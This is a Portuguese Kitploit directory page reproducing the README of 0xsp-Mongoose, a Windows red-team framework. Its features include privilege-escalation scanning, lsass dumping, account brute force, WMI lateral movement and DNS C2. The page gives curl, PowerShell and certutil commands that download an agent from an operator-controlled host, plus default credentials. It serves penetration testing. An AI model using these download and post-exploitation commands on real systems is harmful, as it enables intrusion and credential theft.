Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
0xsp-Mongoose — um framework único para simulação de segurança cibernética e operações de red team, auditoria do Windows para vulnerabilidades mais recentes, configurações incorretas e ataques de escalonamento de privilégios, replicar as táticas e técnicas de um adversário avançado em uma rede. | Kitploit
Ferramentas/GitHubGitHub/zux0x3a/0xsp-mongoose
Escalada de PrivilégiosScanners de VulnerabilidadesMapeamento de RedeAtaques de SenhaExploraçãoMovimento LateralExploração de Aplicações WebPós-ExploraçãoComando e ControleRed TeamingAnálise de DNSArchived
534117há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

um framework único para simulação de segurança cibernética e operações de red team, auditoria do Windows para vulnerabilidades mais recentes, configurações incorretas e ataques de escalonamento de privilégios, replicar as táticas e técnicas de um adversário avançado em uma rede.

Ver RepositórioSite

GPLv3 license

Apoie o projeto para desenvolvimento contínuo (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED para Windows

Versão Atual 2.2.0

A versão 0xsp mongoose red é fornecida para auxiliar suas necessidades durante a simulação de segurança cibernética. Usando esta versão, você poderá auditar um sistema operacional Windows alvo em busca de vulnerabilidades de sistema, configurações incorretas e ataques de escalonamento de privilégios, e replicar as táticas e técnicas de um adversário avançado em uma rede.

com suporte a Node.js para API de aplicação web, torna-se muito mais fácil a instalação e personalização de maneira oportuna. O agente sensor Windows se comunicará com a API da aplicação para transferir resultados e receber comandos como técnica bidirecional.

o agente é capaz de identificar e detectar exploits do Windows usando os módulos windows update api e exploit database definitions. A nova versão também detectará as seguintes vulnerabilidades.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Funcionalidades

  • Técnicas de varredura de escalonamento de privilégios do Windows.
  • Aplicação web construída com NodeJS
  • Suporta banco de dados SQLite
  • Técnicas de movimentação lateral. vídeo
  • Canal de comunicação bidirecional. vídeo
  • Empacotamento online de plugins.
  • Mecanismo de script de detecção de exploits aprimorado.
  • Módulo de força bruta de contas do Windows (Local / Domínio)
  • Weaponization da função run-as-user da API do Windows. Vídeo
  • Varredura de rede local e enumeração de compartilhamentos.
  • Técnica de dump de memória lsass (plugin).
  • Modo shell interativo DNS C2C

Instalação

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

credenciais de acesso padrão:

  • usuário: admin
  • senha: 0xsp

Script Python para DNS C2C

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

Implantação rápida do agente

root@kitploit:~
#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Uso

root@kitploit:~
-s --recuperar serviços do Windows e drivers instalados.
-u --recuperar informações sobre usuários, grupos, funções.
-c --pesquisar drivers conectados por arquivos de configuração sensíveis por extensão.
-n --recuperar informações de rede, interfaces de rede, detalhes de conexão.
-w --enumerar diretórios graváveis, verificar permissão de acesso, permissões modificadas.
-i --enumerar informações do sistema Windows, sessões, verificação de Always Elevated.
-l --pesquisar em qualquer arquivo por uma string específica, ex: agent.exe -l c:\ password *.config.
-o --especificar endereço do host da aplicação Node.js, você também pode usar srvhost.
-p --enumerar softwares instalados, processos em execução, tarefas.
-e --ferramenta de inspeção do kernel, ajudará a pesquisar em bancos de dados de ferramentas por vulnerabilidades do kernel do Windows.
-x --senha para autorizar sua conexão com a aplicação Node.js.
-d --baixar arquivos diretamente na máquina alvo.
-t --enviar arquivos da máquina alvo para a aplicação Node.js.
-spooler --escanear um único host ou lista de hosts para possível CVE-2021-1675 (ex: -spooler -srvhost ou -spooler -hosts )
-m --executar todos os tipos de varredura conhecidos juntos.

[!] SEÇÃO DE TÁTICAS DE RED TEAM

-r --criar um shell reverso com conta específica.
-lr --Técnica de movimentação lateral usando WMI (ex: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --descoberta de rede e enumeração de compartilhamentos
-dns --estabelecer shell interativo DNS C2C
-cmd --transferir comandos via HTTP Shell
-interactive --iniciar modo interativo (ex: carregar plugins, etc.)
-username --autenticação de identidade para módulos de ataque específicos.
-password --autenticação de identidade para módulos de ataque específicos.
-host --identificar host remoto para conduzir um ataque.
-srvhost --definir rhost da aplicação Node.js.
-bf --módulo de força bruta de usuários locais / usuários de domínio
-import --importar e executar arquivo dll localmente
-remote --importar e executar arquivo dll de um host remoto

Documentações

https://0xsp.com/security%20dev/0xsp-mongoose-red

Site de pesquisa detalhada

https://0xsp.com

Conferências de Segurança

  • Standoff365 - Russia (https://standoff365.com/conferences/357)

Tutoriais da ferramenta

certifique-se de se inscrever no seguinte canal para ser notificado quando novos tutoriais e truques forem publicados para o 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Baixar ferramenta